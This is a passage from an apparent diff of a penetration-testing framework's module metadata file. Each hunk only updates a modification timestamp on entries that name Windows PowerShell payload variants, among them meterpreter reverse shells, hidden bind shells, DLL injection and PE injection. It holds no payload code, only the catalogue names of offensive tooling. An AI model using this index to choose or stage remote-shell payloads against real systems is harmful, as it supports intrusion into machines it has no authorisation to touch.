"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/meterpreter/reverse_http",
|
||||
@@ -172374,7 +172598,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/meterpreter/reverse_http_proxy_pstore",
|
||||
@@ -172413,7 +172637,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/meterpreter/reverse_https",
|
||||
@@ -172454,7 +172678,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/meterpreter/reverse_https_proxy",
|
||||
@@ -172493,7 +172717,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/meterpreter/reverse_ipv6_tcp",
|
||||
@@ -172531,7 +172755,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/meterpreter/reverse_named_pipe",
|
||||
@@ -172570,7 +172794,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/meterpreter/reverse_nonx_tcp",
|
||||
@@ -172609,7 +172833,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/meterpreter/reverse_ord_tcp",
|
||||
@@ -172648,7 +172872,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp",
|
||||
@@ -172687,7 +172911,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_allports",
|
||||
@@ -172727,7 +172951,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_dns",
|
||||
@@ -172768,7 +172992,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_rc4",
|
||||
@@ -172809,7 +173033,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_rc4_dns",
|
||||
@@ -172848,7 +173072,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_uuid",
|
||||
@@ -172888,7 +173112,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/meterpreter/reverse_winhttp",
|
||||
@@ -172928,7 +173152,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/meterpreter/reverse_winhttps",
|
||||
@@ -172963,7 +173187,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/metsvc_bind_tcp",
|
||||
@@ -172998,7 +173222,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/metsvc_reverse_tcp",
|
||||
@@ -173037,7 +173261,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupdllinject/bind_hidden_ipknock_tcp",
|
||||
@@ -173076,7 +173300,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupdllinject/bind_hidden_tcp",
|
||||
@@ -173114,7 +173338,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp",
|
||||
@@ -173153,7 +173377,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp_uuid",
|
||||
@@ -173190,7 +173414,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupdllinject/bind_named_pipe",
|
||||
@@ -173227,7 +173451,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupdllinject/bind_nonx_tcp",
|
||||
@@ -173265,7 +173489,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupdllinject/bind_tcp",
|
||||
@@ -173305,7 +173529,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupdllinject/bind_tcp_rc4",
|
||||
@@ -173343,7 +173567,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupdllinject/bind_tcp_uuid",
|
||||
@@ -173379,7 +173603,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupdllinject/find_tag",
|
||||
@@ -173417,7 +173641,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupdllinject/reverse_ipv6_tcp",
|
||||
@@ -173454,7 +173678,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupdllinject/reverse_nonx_tcp",
|
||||
@@ -173491,7 +173715,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupdllinject/reverse_ord_tcp",
|
||||
@@ -173529,7 +173753,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp",
|
||||
@@ -173567,7 +173791,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_allports",
|
||||
@@ -173606,7 +173830,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_dns",
|
||||
@@ -173646,7 +173870,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4",
|
||||
@@ -173686,7 +173910,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4_dns",
|
||||
@@ -173724,7 +173948,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_uuid",
|
||||
@@ -173763,7 +173987,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_hidden_ipknock_tcp",
|
||||
@@ -173802,7 +174026,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_hidden_tcp",
|
||||
@@ -173840,7 +174064,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp",
|
||||
@@ -173879,7 +174103,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp_uuid",
|
||||
@@ -173916,7 +174140,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_named_pipe",
|
||||
@@ -173953,7 +174177,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_nonx_tcp",
|
||||
@@ -173991,7 +174215,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_tcp",
|
||||
@@ -174031,7 +174255,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_tcp_rc4",
|
||||
@@ -174069,7 +174293,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_tcp_uuid",
|
||||
@@ -174105,7 +174329,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupmeterpreter/find_tag",
|
||||
@@ -174143,7 +174367,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_ipv6_tcp",
|
||||
@@ -174180,7 +174404,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_nonx_tcp",
|
||||
@@ -174217,7 +174441,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_ord_tcp",
|
||||
@@ -174255,7 +174479,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp",
|
||||
@@ -174293,7 +174517,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_allports",
|
||||
@@ -174332,7 +174556,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_dns",
|
||||
@@ -174372,7 +174596,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4",
|
||||
@@ -174412,7 +174636,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4_dns",
|
||||
@@ -174450,7 +174674,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_uuid",
|
||||
@@ -174489,7 +174713,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/peinject/bind_hidden_ipknock_tcp",
|
||||
@@ -174528,7 +174752,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/peinject/bind_hidden_tcp",
|
||||
@@ -174566,7 +174790,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/peinject/bind_ipv6_tcp",
|
||||
@@ -174605,7 +174829,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/peinject/bind_ipv6_tcp_uuid",
|
||||
@@ -174641,7 +174865,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/peinject/bind_named_pipe",
|
||||
@@ -174677,7 +174901,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/peinject/bind_nonx_tcp",
|
||||
@@ -174715,7 +174939,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/peinject/bind_tcp",
|
||||
@@ -174755,7 +174979,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/peinject/bind_tcp_rc4",
|
||||
@@ -174792,7 +175016,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/peinject/bind_tcp_uuid",
|
||||
@@ -174828,7 +175052,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/peinject/find_tag",
|
||||
@@ -174866,7 +175090,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/peinject/reverse_ipv6_tcp",
|
||||
@@ -174902,7 +175126,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
